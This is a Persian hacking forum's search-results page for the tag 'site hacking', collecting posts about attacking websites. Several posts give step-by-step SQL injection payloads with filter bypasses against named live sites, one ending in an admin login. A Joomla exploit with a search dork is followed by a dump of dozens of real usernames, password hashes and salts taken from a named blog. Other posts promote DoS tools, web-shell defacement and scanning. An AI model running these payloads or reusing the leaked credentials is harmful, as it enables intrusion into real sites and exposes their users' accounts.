discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'هک سایت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

78 نتیجه پیدا شد

  1. با سلام خدمت دوستان عزیز توی این ویدئو ۵ نکته جالب در رابطه با دیفیس رو گفتیم و به دوستانی که به دیفیس علاقه دارن خیلی پیشنهاد میکنم 😁 لینک در یوتیوب لینک در آپارات
  2. ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : https://www.nitrogenium.co.in/features-product.php?id=45 با قرار دادن ' آسیب پذیری مشخص خواهد شد https://www.nitrogenium.co.in/features-product.php?id=45' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور https://www.nitrogenium.co.in/features-product.php?id=45 order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group https://www.nitrogenium.co.in/features-product.php?id=45 group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم https://www.nitrogenium.co.in/features-product.php?id=45' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت https://www.nitrogenium.co.in/features-product.php?id=45' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل https://www.nitrogenium.co.in/features-product.php?id=45' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
  3. با سلام خدمت شما دوستان عزیز در این تاپیک قصد دارم ابزار Hammer که برای حملات dos و ddos استفاده می شود رو به شما آموزش بدهم . برای شما یک ویدئو آموزشی آماده کردم : در فایل ضمیمه برای شما آموزش تصویری رو آماده کردم تا بتوانید بهتر این ابزار رو یاد بگیرید . فرمت : PDF به شما هم آموزش ویدئویی رو پیشنهاد می کنم و هم آموزش تصویری ، پیروز باشید 😁 Hammer Image.pdf
  4. با سلام خدمت شما کاربران و مدیران عزیز انجمن Guardiran من MR.MSA در این تاپیک قصد دارم یک افزونه WordPress Theme Detector and Plugin Detector برای اسکن سایت های وردپرسی را به شما معرفی کنم . ---------------------------------------------------------- ویژگی ها : نوع پوسته (them) سایت افزونه های معروف استفاده شده در سایت ورژن تم و پلاگین های سایت ---------------------------------------------------------- نکات قابل توجه : این افزونه برای بعضی از سایت های وردپرسی خوب جواب نمی دهد ولی در بعضی سایت ها بدرد بخور هست. برای ورژن تم و پلاگین خوب عمل می کند . مشکلی که این افزونه دارد این است که سرعت اسکن پایینی دارد. ---------------------------------------------------------- میزان خطا افزونه : تقریبا بین ۳۰ تا ۴۰ درصد میزان خطای این افزونه است.(طبق برسی من ) ---------------------------------------------------------- دانلود افزونه WordPress Theme Detector and Plugin Detector : Chorme FireFox ---------------------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو گذاشته باشم و از این افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************* MR.MSA ************* <------------------------MR.MSA----------------------> ------- باگ -------- <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <نکته مهم در متد join > ----- افزونه ------ <افزونه Wapplyzer (اسکنر سایت ) > ------- نرم افزار -------- <نرم افزار ریکاوری برای مک> ------- کالی لینوکس ------ <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس > <------------------------MR.MSA----------------------/>
  5. با سلام خدمت شما دوستان عزیز سایت GUARDIRAN.ORG من MR.MSA در این تاپیک قراره است افزونه Wappalyzer رو به شما معرفی کنم . لینک دانلود در آخر پست . ---------------------------------------------------------- افزونه Wappalyzer اسکنر سایت است که با آن شما می توانید : ۱- نوع cms سایت ۲- افزونه های نصب شده در سایت ۳- زبان های برنامه نویسی استفاده شده در سایت و زبان برنامه نویسی اصلی سایت ۴- نوع دیتابیس سایت ۵- ورژن cms ، پلاگین ، زبان برنامه نویسی سایت . ۶- و..... رو بدست آورید . ---------------------------------------------------------- نکات قابل توجه : در بعضی از سایت ها افزونه توان پیدا کردن بعضی اطلاعات را ندارد بنابراین نمیشه گفت که تمامی اطلاعات را به شما می دهد ولی در بیشتر سایت ها امکان پیدا کردن اطلاعات وجود دارد . ---------------------------------------------------------- میزان خطای افزونه : میتوان گفت بین ۲۰ تا ۳۰ درصد این افزونه خطا دارد . ---------------------------------------------------------- لینک دانلود افزونه Wappalyzer : chrome Firefox ---------------------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو نوشته باشم و از افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > <نکته مهم در متد join > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  6. MR.MSA

    نکته مهم در متد join

    با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  7. با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که :‌ در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که :‌ با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon :‌ ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : http://site.com/news.php/id=polygon((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ،‌ پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
  8. با سلام خدمت شما دوستان گرامی بعد از این که متوجه ی این شدم که اموزش های سیستم عامل کالی لینوکس در انجمن دیگر گذاشته نمیشود و دوستان میخواهند که اموزش هارو از صفر یاد بگیرن بنا به این شدم که دست به کار بشم و با کمک دوستان عزیز در انجمن اگر نواقصی دیدن در تاپیک ها کمک کنن تا بر طرف بشه..... دوستان تازه کار و مدیران شبکه و حتی یا وبمستران هم میتوانند از این اموزش ها برای محک زدن امنیت سایت خود استفاده کنند و در صورت مشاهده ی نقطه ی ضعف انرا بر طرف کنند.لطفا از اموزش ها برای افزایش امنیت سایت های خودتون استفاده کنید تا کمتر شاهد هک شدن سایت های ایرانی باشیم. در صورت نیاز به مشاوره و کمک جدی میتونید به صورت پیام خصوصی با ما در تماس باشید. قوانین تاپیک: اسپم ممنوع(دوستان عزیز چون خود اموزش ها طولانی هست لطف کنین و اسپم ندید در صورت مشاهده با کاربربرخورد میشه) ((سوالات خودتون رو درلینک زیر بپرسین تا به انها خودم و یا دیگر مدیران جواب بدن)) http://guardiran.org/forums/topic/2259-سوالات-مربوط-به-بخش-اموزش-کالی-لینوکس/?p=9251 از قرار دادن اموزش های تکراری پرهیز کنین در صورت گذاشتن ابزاری خاص لینک اسکن فراموش نشود با تشکر فراوان از شما دوستان گرامی
  9. درود آموزش تصویری دیفیس سایت رو اماده کردم 😉 که شامل آپلود شل به وسیله پنل ادمین و بایپس لاگین پیج هست (به همراه اخرین ورژن شل آلفا) ادامه پارت ها در پست بعدی پسورد فایل: www.guardiran.org Desktop.part1.rar
  10. درود برخی از دوستان در پیام خصوصی تقاضای آموزش هک سایت با باگ Sql Injection توسط افزونه هکبار Hackbar در فایرفاکس Firefox رو داشتند و بر این اساس بنده تصمیم گرفتم انشاا.. این آموزشهارو ضبط کنم و برای شما عزیزان ارسال کنم . در واقع اگر در یک جمله بخواهیم بگیم اینه که : " افزونه هکبار ( Hackbar Addon ) بسیار کار هکر رو در هک سایت توسط باگ Sql Injection راحت کرده و قابلیتهای منحصر بفرد که در سری فیلم های آموزشی خواهید دید " اسپم ندین و سوالات رو تنها در این بخش مطرح کنید . .
  11. سلام دوستان .. درود من یک سایتی رو اسکن کردم و فهمیدم که باگ sql injection داره .. توی آموزش های انجمن هم درست توضیح ندادن که بفهمیم باید چیکار کنیم و الان من نمیدونم چجوری باید این سایت رو بزنمش.. توی آموزش ها به این شکل گفته شده .. www.example.com/news.php?id=1 .... من هرکاری میکنم نمیدونم این قسمت رو (news.php?id=1) باید از کجا پیداش کنم...اصلا این چی هست؟؟ چجوری باید این id رو پیدا کنم ؟ اون سایتی که من اسکنش کردم با وردپرس ساخته شده ممنون میشم اگر راهنمایی کنید و یا یک سایتی رو به همین روش بزنید و به صورت تصویری پست کنید توی انجمن..
  12. با سلام خدمت اساتید محترم. وقتتون بخیر.در رابطه با برنامه هویج یه سوال داشتم اینکه دقیقا چه چیزی رو به آخر سایت اضافه کنیم تا بفهمیم باگ SQL داره یا نه؟
  13. Worst_board

    هک سایت

    بسم الله الرحمن الرحيم ?جوملا? دوستان من توی این تاپیک میخوام در باره ی مبحث سایت و پیدا کردن حفره هاو باگ هایش و سپس اقدام به نفوذ صحبت کنم پس لطفا توجه کنید. جوملا امنیت نسبتا خوبی داره ، یعنی نمیشه گفت چون ما میتونیم بهش نفوذ کنیم ضعیف است و باگ های مسخره ای داره . خیلی از سایت های معتبر جهان مثل فروشگاه های اینترنتی از سایت جوملا ست من خودم چند وقت پیش ی سایت فروشگاه فرانسوی رو تونستم بهش نفوذ کنم دوستان من فقط بگم که ی موضوعی هست که باید همتون بدونید. اونم اینکه باید توی این جور آموزش ها جنبه داشته باشید یعنی اول برید کامل یاد بگیرید (ی دو سه ماهی مثلا فقط وقت بذارید واسه همین آموز ش )و بیگدار به آب نزنید دیگه نصیحتی نیست و خودتون باید مواظب باشید خوب برای پیدا کردن حفره های سایت های جوملا راه های متعددی هست. ولی بهترین برنامه و بهترین راه استفاده از اسکنر های موفق و قوی در این زمینه است اونم برنامه ای نیست جز برنامه ی JOOMSCAN این برنامه توی سیستم عامل های کالی لینوکس (اوبونتو) نصب هست ولی توی بکترک باید نصب کرد. خوب حالا توی کالی سرچ کنید joomscan سپس وقتی وارد محیط این ابزار شدید باید طبق دستور های زیر پیش بروید دستور : joomscan -u target.com تارگت نام سایت است حالا باید منتظر باشید اسکن شروع بشه . ببینید ی نکته ای که با ید بدونید اینکه مهم نیست چن تا حفره یا باگ به شما نشون میده بلکه نهم اینکه چنتا از اسکن ها با پاسخ yes است سپس باید یکی یکی تست کنید . یعنی اکسپلویت هایی که میده به شما را به آخر آدرس سایت جوملا توی مرورگر اضافه کنید . توی یکی از اونها پسورد هش وجود داره که باید با ابزار هایی که بعدا میگم نوع هش را پیدا کنید و سپس رمز گشایی کنید به همین راحتی در ضمن کسی هست بدون که چی دورکی در گوگل باید سرچ کرد که فقط سایت های جوملا رو بیراه؟ ??? تشکر فراموش نشه Worst_board ?
  14. باسلام خدمت دوستان گل گارد ایران.این باگ بسیار تارگت های زیادی داره. ابتدا دورک کد PHP: inurl:option=com_tag بعدد این اکسپلوریت و ب اخر ادرس اضافه کن کد PHP: index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component بعد رمز ادمین و تمام کاربرای سایت و بهت میده که باید کرک کنی تا رمز اصلی بدستت بیاد همین اینو ادرس و ببینید حتما متوجه میشید. کد PHP: http://www.eldoceblog.com.ar/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=componen t یوزر پسورد کد PHP: uhs16bh0ff1:03da8ebdc907de99ab136b910f2c176f:wzhsY2lsdOSY8qfoonzerfwSUgQog9oG:Registered,RuineeCenTuse:ce6d22250374561b8a44c413366463f1:AHxXlDDYnF3uKDyCZetZPWrlvTaTzHJP:Registered,ldx7v2o0y1s:2d4252f1a7b813b1953145d7fb6ace35:HCzd3NO2PdwsRWD7lT7ypS0C1NzOnW4k:Registered,notfl:a053c5bcb94965f6c2115f863af5410c:Vkni051ZsRRSFNNEryvRmImQQDa7agGy:Bloggers,notdpf:b73038b419b6e45637fd6d0661d1a78d:Ls71M34Md4LkcQi8kPSczgRK6pbLXi0G:Bloggers,notprs:e9ac4de97f82ccb5c7ba58297dee4599:GWmvksty6pRgzMQ23zDJ2p9W5P0omQhb:Bloggers,nottf:01cf6d9dd79781997b79c2e6116720ae:m7OijSh3Mg5Gsf6jFnfVueX8kZpJCdi4:Bloggers,maca:b0a16ffe8d18a8ff8c939cb6562f2d98:BGjwJonlCNxMrYn2diaxGmqvZchAZlPh:Manager,notcj:20859b839eab28d8ec20168aa91c0702:h8dp0PAhodBz6Rg7WiC8Xbjmd1HaIY8l:Bloggers,fernando:f12176debaacbc2c8df8801d9ce61762:RRbVK0vvaayMwCDbuwO3VprmqPae0R2K:Super Administrator,Poigma:dbe4ac9117a8bdfb33540e6cb436dbf0:wOfm0qdmU6Y39OFdRBbqEasnclVt72E5:Registered,passm:6d36a8415ba717c7997dc4b8c69813a6:7SXixpFIPRMiLgOApg9m00gSuP2XnhpJ:Bloggers,mcardarelli:60ffc723c55510fed14b837d24eb57d7:EVphmPbG8zxkVQJusIUsIpYwb0iIAYFd:Super Administrator,jmartinez:81f9b64bba3e7173ec55cb8867e05bd3:AwBgVA2Hlkcjtswl2Zqv1vlqWyEy5roc:Bloggers,rbattaglino:3dc4f70ee011b06a1e63018c287af296:jvW18dEeRv2J1XizwEAXRGBzdngZtvHx:Bloggers,cfantini:fe2e6059f00ee1751b17268255f784dc:UIL84SQhEFrkP1f5rLXMeiRK6BUtawOJ:Bloggers,drsabagh:a57833ccebd00963ae0fe31d36f420a5:m1fmT7QbGvcAcQsirwYOVzzJfcTFafO7:Bloggers,eldoceblog:dcec177b8c35a8d8cce5a2ad42aa1384:8JVNUQNJfdrcB0qOqw0D4eMKGHHzxIEw:Bloggers,nottgu:58b7dd1c0f74c3d197b8637894ed2df2:bBK7jG4LzWzodJPmCZagzx2KBm6WojZG:Bloggers,bpqlmhaic:83191c03563c2394645938dccf866747:RM5NJ6VPGTFJbqODxODbyeili6ZW1dR3:Registered,mcqdgyjm:7d56bbc315a6322bc49704c98a1b14f4:Pqjr9Wd3afmWOxUgQam8umbPkDQlfBFc:Registered,qdkrpermv:039c071f1b0389b1fa68b22951dee708:nctL730058fXlVuJOqOxJ6xOrIiJUDJO:Registered,jcqmfuqj:1b1a7479e0a25bd938a1fcfc4b8c779e:K2YRLMtXEJBdyyP44PV9LYA6PMhoYTup:Registered,itanuawlwar:7207f4dfc38c17f1e90c5c85a1a92ed5:Ky595rwJnMLae0nzrrYiEFE9QsyZOfWZ:Registered,Jagmaawarne:94a934b06647b51f8b43321ccce22150:8vFO15ew5GpFFyrUnGJbnI0p1PNaxVZu:Registered,Lindainlsq:b96cd3b9a388c83fb9c54ab4b15d726a:P8uA9S04OqCn3sG5jtT3SG0whHM2AFR9:Registered,pixrumnbcikiar :b3e4185ed84d8154f1d350871b3c7acf:GLaZfrSfXeIkP2Ta2EAWMGxbqkwV6p2o:Registered,oqlvucphuakm:82504aff74e84b1cdfed43ba6eebf7b2:FuQ1DqDFbbijDoW5e5mS4uTdoo9MZtk0:Registered,mcqpeixa:e75ae2fef2a8b0dbdb2b76758961695f:kAe3NWAVhzTrvUg3ULgvPj509ucXXi6w:Registered,Tattfuergylug:cd41dc24c50affc767c0ccb91e36c500:szVeVfcsPPBn5HKEf8APvyC5RomebNT5:Registered,lakeshabrentnal:35b80df934770ea43efa877ecd322f9a:tzmtF1WYapXM8YvbdX5eyV8lSafIqvxQ:Registered,cexexcaby:b16b93d74547bdefdea44e0b4b0a3a66:fsqchpGrgAozKtVF2vMbPf9Wy3tRngIC:Registered,ev7of0n1i1:b211faac87d1829741fefee24640652a:Wc7DMTWCEx6NcNHDpwapjtUp4hktvw64:Registered,lionlionov94:62083001cd4e55b8de21a9d78d41f542:99GGOv9EgADQRAb2v257VdtLdsLNvrfL:Registered,PRICYDRED:2c71d4ae3ba4aac3f787f5d4a6654b74:vRjQDJDWEr9Exa5En71KSt4EftwVlRKh:Registered,loyattgeovosy:5de3f749deeacfed85d660221f25be11:mPVYGS7rwLzYs09hytG22JxJaoW5TvbJ:Registered,Fruttphetle:9f4e50c585dcdd58f8e67874416dc111:wrZrGlX5GI92cz6jUdUoXbXUfnt781Oy:Registered,szybka pozyczka:f6ed603d45b2b52c59e674d109d2d3e7:ylf2R0phRdccKqgUBbaLGnfrrY7bqQ3e:Registered,sherellquist:30b1cbb5029de43b60797bdacace8164:MvoSekJecVvtQ5F3T8Z6fkfFCTLPGpYp:Registered,soccere:dde6d9dd364315492f314596a77724ba:2cxVAfK22a2SRDfpVYOymxWvP9SNRCUz:Registered,tavaClawn:fab72c1cd8e2f6d4a816efb8f53d8084:nRm1E92b9lRAA6p6qZF09yKa3e9kOiyW:Registered,RizBruttiGGer:f0067a8da323b2b79e5faf1a96e12594:ODbj1tSQf5ZvMHTsgq3mfS5DV9GVfcu9:Registered,Irrettekick:2e2ac70458c59caca91f07eae0e4cc8d:w5KdGDLS2P7tWyfJhYoCkle4sDwCvWX9:Registered,wthvqeqle:29128ad6089296febf13d4df716ad3eb:hgdcZZ211PWzi6BYpUXR6GyDUpRYMesW:Registered,roopsybribrak:94599d204adcd80947459fe3c47c29fb:C5GHSeJJzoAWi6OMojXxpabSuoHn3QuZ:Registered,scammajelve:985797b3d10e434fa3e896558960ed80:soymTef38ryeJKSgnQnd6JftGmuKbcUK:Registered,Erommurgitirl:f4feefaf8625907c8c760cf39149f071:RPuP1MbDerILuGAc25YSwsRLrerHLDVm:Registered,Sireworic:ced32b4b681c3db32c96d9278b8f306d:evGr2vJdyrO27ojwOF31p0Vi7vZljVs9:Registered,tdcasinoum:123bc1776494b621c959025395245077:iMQgfg6IESEMsj9DsAaZ7ypASugDtjmA:Registered,Stussyaddessy:bc5e4620accdf2d287c82b1361a47e04:0YaEux9NRHpQ7ubRCDL4jkk6xk5LgzqM:Registered,mxperhapsat:cca3a950e2d46e88e7141daa6c818c2c:9m2StFIKsKkeag7fUQKj3WSbqmZRZ5fB:Registered,DellBealm:c35c17817cff02cc13e45de270826c3c:k4XDteHCb1AYsslSSWbLqqp7RKAc17KS:Registered,Stoodsthoutty:e759edc4b5a035140a19c1001f3450b5:LLiQ4kmKBHrwbzrISFypxy3SU1kqcO7Q:Registered,pewproommern:ca2e27acfc744f88a31787313159852e:L0gSpUjA3FMjtQGJ2pNukDa1gdAsmu36:Registered,Raxybypeanync:c82b2bb6558e6e652b70095d5cf18202:ZgaWbUi4WF7PCsvMtLxWz50LKibyi2fZ:Registered,sueptpoonenry:47be956a2fc3c5dd60ce1dc30ba879a6:pvXWdr6fi89VFcxdznaNkKDtoJjDGQPb:Registered,itaxiaSog:712a83347cb16c221ef102a9d85ab46f:3Hh0ygxYObHrwi5sn22p28qPDqO19DGD:Registered,Pikavippi:6d0de3a90f9e7d2452e4c61a899c16ef:dBWvAFmFNu9xpZPrqndCahY9Pmhs2AOO:Registered,luettamartinat:fe981f239dba3f059715b2d13046305a:bU8MR7No7akWkCRHHxEBjw6f5jxpaoEU:Registered,jcqzfgft:9ea17a7177e19c3fa7c2d83f31894238:FdslMbY979JjHanmT3OTcuLTj8fXTghw:Registered,qpqteqscs:fa499ec1b9b258397af9631cca6a31dc:1BnsFcq8Y6WhwxfCxnnt9VofvaOKVXRj:Registered,ncqsyxeh:a8a32628e840cf951e80121fbc25078e:3I1ZZ0G2NIYmyD3O2jbfHHyLrbQvM0qL:Registered,qpqgsersx:7debb38ea2ad3857448a3320b7affb6c:h6SGQdo1DND0dgc14zQ5hXy8q4d915hA:Registered,rpqjvjyzt:d9cd1e36a3fb8e9cb88dc9edd9bd0d0e:ViilaMDfMPW8cLsfp8oPB0Nu4y8VRiop:Registered,gcqginfy:0828720db32f91f0ed4ca9a5adcfc475:Mtmi7NlDAaQUA0FVkI89dglGuETCUq0w:Registered,elcapo:2ec869e1846922ed5dec839121ef622c:OVEDZ47TFchmIGdZHcsci3LOU1rGfWIp:Registered,gjfqubgg:ca0d6223c9921d6eecb85a5a32d7e40b:ERfQ7bz9X9ebNnkwTKLlXG7DTaPihOap:Registered,wd5a72v4bza:5ff6706b26bea40d52290944166eb9a0:dsurrJ7wA4ztcoIniy3tWpVsQphvDmoN:Registered,Godieguille: